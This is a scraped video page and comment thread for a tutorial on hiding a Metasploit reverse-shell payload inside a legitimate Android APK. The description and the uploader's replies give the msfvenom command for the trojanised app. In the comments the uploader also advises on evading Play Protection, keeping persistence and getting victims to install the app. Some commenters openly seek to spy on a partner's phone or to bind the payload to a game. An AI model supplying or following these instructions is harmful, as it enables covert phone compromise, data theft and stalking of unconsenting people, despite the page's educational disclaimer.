How hackers hacking any android mobile ?

Поділитися
Вставка
  • Опубліковано 5 жов 2024
  • #cybersecurity #hacking #android #kalilinux #hackingtools #msfvenom #malware #payload #offensivesecurity
    This educational tutorial video will teach you how hacker embed apk payload with legitimate apk.
    -----------------------------------------------------------------------------------
    LINKS:
    apktoolfix : github.com/gra...
    Latest Apktool : apktool.org/
    -----------------------------------------------------------------------------------
    Command syntax:
    sudo msfvenom --platform android -x ~/Desktop/apktool_2.9.2.jar -p android/meter prefer/reverse_tcp LHOST=kalimachine
    Ip LPORT=any port number -f raw -o filename.apk
    I hope you enjoyed the video and found value in the content. We value your feedback, If you have any questions or suggestions feel free to post them in the comments section or contact us directly via our social platforms.
    NOTE: I am not sponsored by or affiliated with any of the products or services mentioned in this video, all opinions are my own based on personal experiences.
    DISCLAIMER: All information, techniques, and tools showcased in these videos are for educational and ethical penetration testing purposes ONLY. NEVER attempt to use this information to gain unauthorized access to systems without the EXPLICIT consent of its owners. This is a punishable offense by law in most countries.
    Follow Us on Social Platforms:
    Discord: / discord
    LinkedIn: / pber. .
    Telegram: t.me/pberacademy
    Show your support by
    ------------------------------------------
    LIKE | COMMENT | SHARE | SUBSCRIBE
    ------------------------------------------
    **THANK YOU ALL FOR WATCHING THIS VIDEO. HAPPY LEARNING AND SEE YOU SOON ALL WITH OTHER INTERESTING VIDEOS. **
  • Наука та технологія

КОМЕНТАРІ • 250

  • @uaebikers
    @uaebikers 4 місяці тому +3

    Nice content. Short & straight to the point with step by step and not too noob-ish.
    Keep up the good work

  • @HeartOfSuccess.00
    @HeartOfSuccess.00 11 місяців тому +4

    LPORT=1.2.2. -F ra ?? Your camera is blocking evrything from here on out. Can you tell me what you wrote ? ( i am hearing imparied)

    • @pberacademy
      @pberacademy  10 місяців тому +2

      Sorry for the inconvenience I will update the comment in description

    • @comonding
      @comonding 9 місяців тому

      @@pberacademy I don't see the full command either. It would be very productive if a word or a txt were uploaded to follow a laboratory

    • @HenryDamian-x9g
      @HenryDamian-x9g 5 місяців тому

      @@pberacademy please just send it here at once, starting from the LPORT

  • @MichaelWeeks-d7i
    @MichaelWeeks-d7i Місяць тому +3

    Everyone unfortunately all this is useless. The reason is 99% of the people at least that I know own a newer phone and the phone is always updated. With that being said none of this will work !!! If you're using Android 14 and up apps are all sandboxed not allowed to talk to each other. If you're using Samsung you got Knox for security if you got the pixel you got a dedicated core that runs security. You guys need to learn hardware hacking.

    • @devakumar6723
      @devakumar6723 Місяць тому +1

      True but atleast we can get a knowledge of how this works...❤

    • @pberacademy
      @pberacademy  27 днів тому

      This is education demo video not definitely for hacking

  • @aditisharma5197
    @aditisharma5197 Рік тому +6

    I was waiting for this video. Thank you very much sir

    • @pberacademy
      @pberacademy  Рік тому

      Welcome

    • @شروحات-ك8ك
      @شروحات-ك8ك 11 місяців тому

      ​@@pberacademyWhat is the issue of merging Payload?

    • @pashabhai3777
      @pashabhai3777 2 місяці тому

      That payload command is not visible because your face is over there😢 I can't copy it .... Please can anyone tell me that hidden command behind the sir 😢

    • @jovinusvlogs5724
      @jovinusvlogs5724 3 дні тому

      I want monitoring my gf phone .how do it

  • @riturajpushpam01
    @riturajpushpam01 7 місяців тому +4

    yes i know about this method... brother can i get contionous live session in this method........ i liked and subrd your channel...

    • @pberacademy
      @pberacademy  7 місяців тому +1

      Thanks

    • @riturajpushpam01
      @riturajpushpam01 7 місяців тому +2

      @@pberacademy yes im still watching your channels content...
      All are superb content here brother..... 😍..

    • @riturajpushpam01
      @riturajpushpam01 7 місяців тому +1

      @@pberacademy most welcome brother.. :)

    • @pberacademy
      @pberacademy  7 місяців тому

      Thank you

    • @pberacademy
      @pberacademy  7 місяців тому +1

      🙏

  • @NANIELMUNDO
    @NANIELMUNDO 6 місяців тому +2

    why are you using a previous version of android not the latest one so when i try to open my payload apk in the vectilm phone there is a notification saying tha this application is made of a previous version of android

    • @pberacademy
      @pberacademy  6 місяців тому +2

      I did testing n-1 to avoid video get flagged

    • @Loading_Code
      @Loading_Code 4 місяці тому

      😂

    • @NANIELMUNDO
      @NANIELMUNDO 4 місяці тому

      @@pberacademy by youtube ??

    • @NANIELMUNDO
      @NANIELMUNDO 4 місяці тому

      What are you laughing at ?​@@Loading_Code

  • @rony8094
    @rony8094 Рік тому +3

    can't see @7:57 . can anyone explain?

    • @pberacademy
      @pberacademy  Рік тому +3

      -p (payload) Lhost Rhost -f raw - o (output path location)

  • @user-e8l7r
    @user-e8l7r 7 місяців тому +1

    Please help sir 🙏🙏 How are you able to start the listener without the app asking for permissions? When I launch my app it asks to access contacts, files and more.. How do you make it so it does not ask? Much appreciated

    • @pberacademy
      @pberacademy  7 місяців тому

      Doesn’t matter depends upon the apk you use

  • @Saleem-i1q
    @Saleem-i1q 3 місяці тому +1

    S sir u r video very diffrent and very knowledgeable for me from others

  • @Henry-db1lc
    @Henry-db1lc 6 місяців тому +1

    Can this be used to trace a hacker that doesn't to appear to leave a footprint?

    • @pberacademy
      @pberacademy  6 місяців тому

      You can but depends upon the track left

  • @rajeevpuri8319
    @rajeevpuri8319 10 місяців тому +2

    sir you are great.sir I want to be ethical hacker , please guide me how can i obtain my aim. thank you.❤❤

    • @pberacademy
      @pberacademy  10 місяців тому +2

      Learn the concept and play capture the flag for hands on experience

  • @ElHalfoot2024
    @ElHalfoot2024 6 днів тому

    How do I communicate with you? Please

  • @muthups1
    @muthups1 Рік тому +5

    Very good and we need more videos like this..

  • @KnownStranger-g4h
    @KnownStranger-g4h 7 місяців тому +1

    Did you install this apk on your personal android device or on emulator?

  • @prathapmilky1678
    @prathapmilky1678 10 місяців тому +3

    Your Great Sir lot of Respect...

    • @pberacademy
      @pberacademy  10 місяців тому

      Appreciate your comment and support

  • @prathapmilky1678
    @prathapmilky1678 10 місяців тому +1

    ] I: Using Apktool 2.7.0
    I: Checking whether sources has changed...
    I: Smaling smali folder into classes.dex..
    Sir how to fix this Error you Know to fix this please Replay me sir...

    • @pberacademy
      @pberacademy  10 місяців тому

      Go to apk tool website and install the latest version

  • @TechToTek
    @TechToTek 11 місяців тому +2

    Hello, thankyou it was a great video. But once we get a session I wanna know how to make it persistent. There are videos of a shell script, but that does not work if the victim device in unrooted. So do you have some info on that?

    • @pberacademy
      @pberacademy  11 місяців тому

      Coming soon

    • @alenbenny2860
      @alenbenny2860 8 місяців тому +2

      @@pberacademy please upload a video about it

    • @pberacademy
      @pberacademy  8 місяців тому

      @alenbenny2860 sure

    • @alenbenny2860
      @alenbenny2860 8 місяців тому +1

      @@pberacademy When, i'm still waiting.

    • @pberacademy
      @pberacademy  8 місяців тому

      @alenbenny2860 working on it

  • @LilaOraon-j1q
    @LilaOraon-j1q 11 місяців тому +1

    Sir, how hacker hack anyone mobile by just Ip address, Ip address se pura mobile kaise karte hain vo dekhavona.

    • @pberacademy
      @pberacademy  10 місяців тому

      Using vulnerabilities and also if device exposed to publicly (Internet)

  • @Allauddinlee007
    @Allauddinlee007 3 місяці тому +1

    It is not working on android 14

    • @ProfChemeng3
      @ProfChemeng3 3 місяці тому

      Yes .i was actually thinking of using already created payloads from GitHub

    • @pberacademy
      @pberacademy  2 місяці тому

      It is depends upon apk compability

    • @tajuddints1231
      @tajuddints1231 Місяць тому

      Esa payload nhi banega jo android 13 aur 14 ke liye work kre

  • @PleaseHandleRachel
    @PleaseHandleRachel 5 місяців тому

    While I understand what you are literally saying I do not understand the terminology. I am a learner and you are an expert. 1 suggestion: add some captions. UA-cams cc aren't so great.

  • @samuelagyapong2709
    @samuelagyapong2709 6 місяців тому +1

    I can't create payload it comes as invalid payload:latform

    • @pberacademy
      @pberacademy  6 місяців тому

      Please check for the typo

  • @SCLEDONFF
    @SCLEDONFF 6 місяців тому +1

    the main difficult thing is to force the victim to install the app🤣🤣

    • @pberacademy
      @pberacademy  6 місяців тому +1

      True but that is best way to

    • @SCLEDONFF
      @SCLEDONFF 6 місяців тому

      @@pberacademy another biggest problem is to bypass the android 12 or android 13 security

  • @Kursi4D
    @Kursi4D 9 місяців тому +1

    Sir, what is the continuation of the code after LPORT=17993 -f ray..... please continue sir, thank you

    • @pberacademy
      @pberacademy  9 місяців тому

      I will share it shortly

    • @pberacademy
      @pberacademy  9 місяців тому +2

      sudo msfvenom --platform android -x ~/Desktop/apktool_2.9.2.jar -p android/meter prefer/reverse_tcp LHOST=kalimachine
      Ip LPORT=any port number -f raw -o filename.apk

  • @pankajsuryawanshi1267
    @pankajsuryawanshi1267 8 місяців тому +1

    13:45 why there is a cut ? Play Protection detect kiya kya xD

  • @thenewlucknow5722
    @thenewlucknow5722 3 місяці тому

    I have created a payload using Metasploit with the help of MSF Venom. When you open this payload, it requests permissions to access various things. If you grant permission, the payload runs. This is how a normal Metasploit payload works. Now, my issue is that I created the payload and I'm trying to install it on Android 14, but I'm encountering this error. I'll send an image. When I increase the SDK version, the error gets fixed, but then the payload doesn't ask for permissions like a normal APK does. It just installs. During editing, I didn't change any code other than increasing the target SDK version. Can you please help me with this?
    Any idea ?

  • @Cashvib-f4w
    @Cashvib-f4w 6 місяців тому +1

    Does it work for android 13 and so on version?

  • @unknown_person055
    @unknown_person055 9 місяців тому +1

    Sir please make an video for this app was built for old version problem please

  • @HenryDamian-x9g
    @HenryDamian-x9g 5 місяців тому +1

    Please would this work on Android 12, 13 and 14

    • @pberacademy
      @pberacademy  5 місяців тому

      Yes it will

    • @HenryDamian-x9g
      @HenryDamian-x9g 5 місяців тому

      Okay, but please can you write out the last line here for me starting from the LPORT:17993 to the output when you were creating the payload, because your face camera actually blocked the last line of code.​@@pberacademy

  • @namanshah4655
    @namanshah4655 10 місяців тому +2

    sir my apktool is not compiling this this apk that give an error like this : Error: apktool execution failed

    • @pberacademy
      @pberacademy  10 місяців тому

      Please run the script. It will fix it

  • @mouzzzamjaddi2697
    @mouzzzamjaddi2697 Рік тому +1

    how to install dependencies if anyone one of them missing?

    • @pberacademy
      @pberacademy  Рік тому

      When you run the script it will install the required package .. if not manually install the missing package using identified name by the scripts

    • @mouzzzamjaddi2697
      @mouzzzamjaddi2697 Рік тому

      Yes, it worked... Thank you

  • @sushildhote8952
    @sushildhote8952 6 місяців тому +1

    is there any way to create persistent sell ..???

    • @pberacademy
      @pberacademy  6 місяців тому

      Yes using vulnerability or cracking the hash

    • @sushildhote8952
      @sushildhote8952 6 місяців тому

      @@pberacademy so plz can you describe or upload a video about how to crack hash..???
      Because I searched more from google and UA-cam but i didn't get information about how to get persistent shell

  • @AnthonyWay-vk4kl
    @AnthonyWay-vk4kl 7 місяців тому +1

    Hey bro you id a jam up job. I am going to start working on a home hacking lab, i will be documenting it and would appreciate any tips, solutions an any info can provide. Ill let you know when i get it off and running. I would appreciate the whole communitys advice, and maybe some of you will join me in this and build your own as well.

    • @pberacademy
      @pberacademy  7 місяців тому

      Sure definitely.. we can connect

  • @jacksparrowyt9048
    @jacksparrowyt9048 9 місяців тому +1

    Small doubt... How to relogin with this app

    • @pberacademy
      @pberacademy  9 місяців тому +1

      You have create persistence payload

    • @jojovipro
      @jojovipro 9 місяців тому

      Same problem with android 12 and up

    • @pberacademy
      @pberacademy  9 місяців тому +1

      @jojovipro let me test it

  • @unknown_person055
    @unknown_person055 9 місяців тому +1

    Apksignger not found showing pls help me bro

  • @GlobalNewsBd71
    @GlobalNewsBd71 8 місяців тому +1

    great, nicely explained. thank you. want more like this

    • @pberacademy
      @pberacademy  8 місяців тому

      Glad to hear it

    • @pberacademy
      @pberacademy  8 місяців тому

      I would request to Watch my android hacking series also

  • @prajwalpawar9237
    @prajwalpawar9237 9 місяців тому +1

    Insted of apk can we use pdf or img

    • @pberacademy
      @pberacademy  9 місяців тому

      No you cannot at the
      Moment

  • @samuelagyapong2709
    @samuelagyapong2709 6 місяців тому +1

    Why is payload invalid : latform

    • @pberacademy
      @pberacademy  6 місяців тому

      Check is there any typo and syntax is correct

  • @Dayangaming0734
    @Dayangaming0734 10 місяців тому +1

    Sir can i do in android install (kali Linux) this process

    • @pberacademy
      @pberacademy  10 місяців тому

      Elaborate your question little bit please

    • @Dayangaming0734
      @Dayangaming0734 10 місяців тому

      @@pberacademy kali linux ko Android ma install kar ke usma try kar sakth ha kya?

  • @hiddengo3232
    @hiddengo3232 8 місяців тому +1

    how to make it persist

    • @pberacademy
      @pberacademy  8 місяців тому

      Videos is coming soon stay tuned

  • @Dayangaming0734
    @Dayangaming0734 11 місяців тому +1

    Can i bind payload with freefire game apk.?

  • @rohitashkumawat9172
    @rohitashkumawat9172 Рік тому +1

    Sir how to bypass play protection please reply sir

    • @pberacademy
      @pberacademy  Рік тому +1

      I have showed in the video ..check out …validate signature required to bypass

    • @dydfrancis1761
      @dydfrancis1761 Рік тому

      ​@@pberacademysha1 is not working anymore whats the alternative

    • @HenryDamian-x9g
      @HenryDamian-x9g 5 місяців тому

      @@pberacademy please elaborate, I don't know how to bypass play protect

  • @7amody7e34
    @7amody7e34 Рік тому +1

    Can you explain noip It's better than ngrok Leaves for open communication

  • @ultimategamingshow90
    @ultimategamingshow90 9 місяців тому +1

    Sir ye payload Android 13 me installed nhi ho rha to kya kre please reply

    • @pberacademy
      @pberacademy  9 місяців тому

      Please repeat your question in English

    • @ultimategamingshow90
      @ultimategamingshow90 9 місяців тому

      This payload not worked in Android 13

    • @ultimategamingshow90
      @ultimategamingshow90 9 місяців тому

      This error is about to install time.
      Error : app not installed as package appears to be involved

  • @dydfrancis1761
    @dydfrancis1761 Рік тому +1

    how do we make it persistent anytime i want to connect back to the victim phone

    • @pberacademy
      @pberacademy  Рік тому +1

      You have install another backup using vulnerabilities.

    • @Delusionel31
      @Delusionel31 Рік тому +1

      Lol using metasploit payload to hack android is one of most idiotic thing you can do

    • @support778
      @support778 Рік тому +1

      @@Delusionel31what the best tool to use

    • @Delusionel31
      @Delusionel31 Рік тому

      @@support778 any kind of RAT like cypher RAT or Craxsrat

    • @pberacademy
      @pberacademy  Рік тому +1

      Options are limitless.. this video is for educational tutorial only not for illegal purpose so consider all the fact using metasploit not bad idea

  • @Rajan-sx8mg
    @Rajan-sx8mg Рік тому +2

    Good video very informative

  • @isaacfrimpong9722
    @isaacfrimpong9722 Рік тому +1

    You do all..thank you ..please can you help me to learn ethical hacking🙏

  • @Allauddinlee007
    @Allauddinlee007 3 місяці тому

    in real andriod phone it is detected and not working properly pls tell me another way

  • @MarshalGodswill
    @MarshalGodswill 3 місяці тому

    Sir. ow do we share from kali linux to adroid, Is it through search of ip address

  • @maniox87
    @maniox87 4 місяці тому

    does this work in Wide area network (WAN) or only in LAN ?

  • @unknown_person055
    @unknown_person055 9 місяців тому +1

    Zipaligner problem sir

  • @deore1001
    @deore1001 8 місяців тому

    The conversation we got from victims mobile ... Using ngrok is unbreakable... Or it can regain as per our need ... If any how condition ip of victims mobile or our changed so doesn't get affected on our connection....?

    • @pberacademy
      @pberacademy  8 місяців тому +1

      Yes, that why we are using reverse proxy ngrok ..even ip address change the connection will pointing to ngrok.. we have not configured victims ip address in reverse only Kali Linux ip address we did it … but the connection will get terminated if network connection or victim rebooted that why persistence hacking technique exist .. maintaining access.. I hope I have answered your question.

  • @Dhiaali2024
    @Dhiaali2024 5 місяців тому

    Sir Why that not working in Android 12 ?😢 Please I need help

  • @3ashayargaming447
    @3ashayargaming447 11 місяців тому +1

    code 8:31 not show for about facecam please send code

    • @pberacademy
      @pberacademy  11 місяців тому

      Please elaborate your query

    • @3ashayargaming447
      @3ashayargaming447 11 місяців тому

      @@pberacademy-f but im no to show for end 8:31

  • @omkargangathade8122
    @omkargangathade8122 2 місяці тому

    Can we also access to the storage of the device??

  • @Atul_Bhardwaj
    @Atul_Bhardwaj 7 місяців тому

    Will it still work if at the time of apk installation on Target device Kali is not running? Also will the be connecting if I restart Kali?

    • @pberacademy
      @pberacademy  7 місяців тому

      Elaborate your question

    • @Atul_Bhardwaj
      @Atul_Bhardwaj 7 місяців тому +1

      @@pberacademy I see I messed up my English there. I wanted to know that is it necessary for us to be online or actively listening at the time of installation of application on target device? Also will it connect if I restart my VM?

    • @PrajjwalSaggar
      @PrajjwalSaggar 3 місяці тому

      ​@@Atul_Bhardwaj bro did you find the answer to your question?

    • @Atul_Bhardwaj
      @Atul_Bhardwaj 3 місяці тому

      @@PrajjwalSaggar no bro

  • @motivational_guru_prashant
    @motivational_guru_prashant Рік тому +1

    This use Android 11 working?

  • @unknown_person055
    @unknown_person055 9 місяців тому

    Sir please give solution to this app is made for older version please please please please

  • @l00_f00
    @l00_f00 Місяць тому

    Does it work to attack any android version?

  • @3t3rnitytv
    @3t3rnitytv 5 місяців тому

    hello it was working good i send the app on my phone and wen i want to install the app,is told me the app is for old android.The apk is problem or something else i made apk music player some help pls.

    • @pberacademy
      @pberacademy  4 місяці тому

      It is fine check you got reverse shell

  • @loicdemakoue1101
    @loicdemakoue1101 Рік тому +1

    your the boss, please I like this content, I waiting again.🙏🙏🙏

  • @Soth0w76
    @Soth0w76 6 місяців тому

    Show me how an Android user hacks the PC. (Kali Nethunter)

  • @unknown_person055
    @unknown_person055 9 місяців тому

    Sir app showing you may have downloaded older version may it not work properly

    • @pberacademy
      @pberacademy  9 місяців тому

      You can download the recent version from the pool website and install it for latest version

  • @deepeshraghuwanshi9727
    @deepeshraghuwanshi9727 3 місяці тому

    Apk is not installing in device so unable to get the access

    • @pashabhai3777
      @pashabhai3777 2 місяці тому

      Because this payload only works in android 7

    • @pberacademy
      @pberacademy  2 місяці тому

      depends upon the apk compability

  • @Allauddinlee007
    @Allauddinlee007 3 місяці тому

    pls upload a video on real android phone on latest version it is not working on my phone

  • @faizandingankar846
    @faizandingankar846 Рік тому

    Can u tell how we can get access to android using bluebugging?

    • @pberacademy
      @pberacademy  Рік тому

      You have to identify the vulnerabilities in blueblooth and reverse hardware signal engineering.

  • @muhammedmishal471
    @muhammedmishal471 11 місяців тому

    from where can i find these templates for the payloads

  • @amine2475
    @amine2475 4 місяці тому

    Does this work for Android 12 and above ?

  • @rajendralalan-my4ld
    @rajendralalan-my4ld Рік тому +1

    Dear make a video for iPhone

  • @HwywgHsisge
    @HwywgHsisge 5 місяців тому

    Not working in Android 14 .... please help

    • @HiHi-qe2ky
      @HiHi-qe2ky 3 місяці тому

      Any solution found?

    • @pberacademy
      @pberacademy  2 місяці тому

      Depends upon apk compability

  • @Surya_556
    @Surya_556 Рік тому

    I was trying to run the msfvenom command, but i was getting an error of undefined method 'strip', how to overcome it. Please reply

    • @pberacademy
      @pberacademy  Рік тому

      Provide me full command

    • @Surya_556
      @Surya_556 Рік тому

      sudo msfvenom --platform android -x /home/surya/Desktop/game.apk -p android/meterpreter/reverse_tcp LHOST=myhost LPORT=4444 -f raw -o /home/surya/Desktop/game1.apk
      @@pberacademy

    • @Surya_556
      @Surya_556 Рік тому

      Error: undefined method `strip' for nil:NilClass

    • @Surya_556
      @Surya_556 Рік тому

      Can you please respond. What is the exact issue and how to resolve it

    • @pberacademy
      @pberacademy  Рік тому

      Provide me full command what you are typing so that I can validate

  • @unknown_person055
    @unknown_person055 9 місяців тому +1

    Apktool fix installing problem

  • @unknown_person055
    @unknown_person055 9 місяців тому

    Sir it will work or not on more than android 11 versions

    • @pberacademy
      @pberacademy  9 місяців тому

      It will work in any android version

    • @unknown_person055
      @unknown_person055 9 місяців тому

      How i install apk tool in linux i am confusing

  • @tamimarabi2678
    @tamimarabi2678 10 місяців тому

    it shows apksigner not found.plz help

    • @pberacademy
      @pberacademy  10 місяців тому

      You have install the apksigner or run the preflight script to validate

  • @support778
    @support778 Рік тому

    7:48 can tell me exactly what you typed because you are blocking what you are typing

    • @support778
      @support778 Рік тому +1

      From -f

    • @pberacademy
      @pberacademy  Рік тому

      That is out path where I want to save the file

    • @support778
      @support778 Рік тому +1

      @@pberacademy can you write the rest of the command word for word please because you are blocking it if re watch your video
      You will see your self

    • @pberacademy
      @pberacademy  Рік тому

      Sorry for the inconvenience

    • @pberacademy
      @pberacademy  Рік тому

      -p (payload) Lhost Rhost -f raw - o (output path location)

  • @SwarupMaity-j9q
    @SwarupMaity-j9q 10 місяців тому +1

    SIR LPORT ke baad kya command hai ?

    • @pberacademy
      @pberacademy  10 місяців тому

      Can you please repeat your question in English

  • @loharstudypoint
    @loharstudypoint 2 місяці тому

    I want to help you sir please help sir

  • @adityapraveen1612
    @adityapraveen1612 8 місяців тому +3

    why is it not working in adroid version 13

    • @pberacademy
      @pberacademy  8 місяців тому +1

      What you are trying

    • @timecop1983Two
      @timecop1983Two 8 місяців тому

      Because the architecture is wrong of your payloaf

    • @StabloGaming
      @StabloGaming 4 місяці тому

      Brother same problem 😢 koi solution mile to batana

    • @NANIELMUNDO
      @NANIELMUNDO 4 місяці тому

      What did you said ???​@@pberacademy

  • @NANIELMUNDO
    @NANIELMUNDO 4 місяці тому

    It s not working at all

    • @pberacademy
      @pberacademy  2 місяці тому

      Please follow the steps correctly as I showed

  • @unknown_person055
    @unknown_person055 9 місяців тому +1

    Error in apksigner sir

    • @pberacademy
      @pberacademy  9 місяців тому

      You should you have latest apktool

  • @thisissparta9699
    @thisissparta9699 4 місяці тому

    This support on android 14

  • @காராளர்
    @காராளர் 11 місяців тому

    Android 13 possible

  • @DeeJay2000
    @DeeJay2000 5 місяців тому

    Great content

  • @国际化
    @国际化 Рік тому

    Your web cam hide some codes please remove next time

    • @pberacademy
      @pberacademy  Рік тому +1

      Can you elaborate pls

    • @mandatieswar7547
      @mandatieswar7547 10 місяців тому

      ​@@pberacademy at the time of you are creating a payload on metasploit the command is covered some of it by your webcam video on top

  • @itspervez17
    @itspervez17 8 місяців тому

    Excellent..

  • @fitnesstips7157
    @fitnesstips7157 Рік тому

    persistence method sir

  • @nanlali1721
    @nanlali1721 10 місяців тому +1

    thanks

  • @muhammadjawad7778
    @muhammadjawad7778 3 місяці тому

    8:01
    Everything is hidden behind yiu

    • @pberacademy
      @pberacademy  2 місяці тому

      sorry for the inconvenience

  • @unknown_person055
    @unknown_person055 9 місяців тому +1

    Sir please make an video for this app was built for old version problem please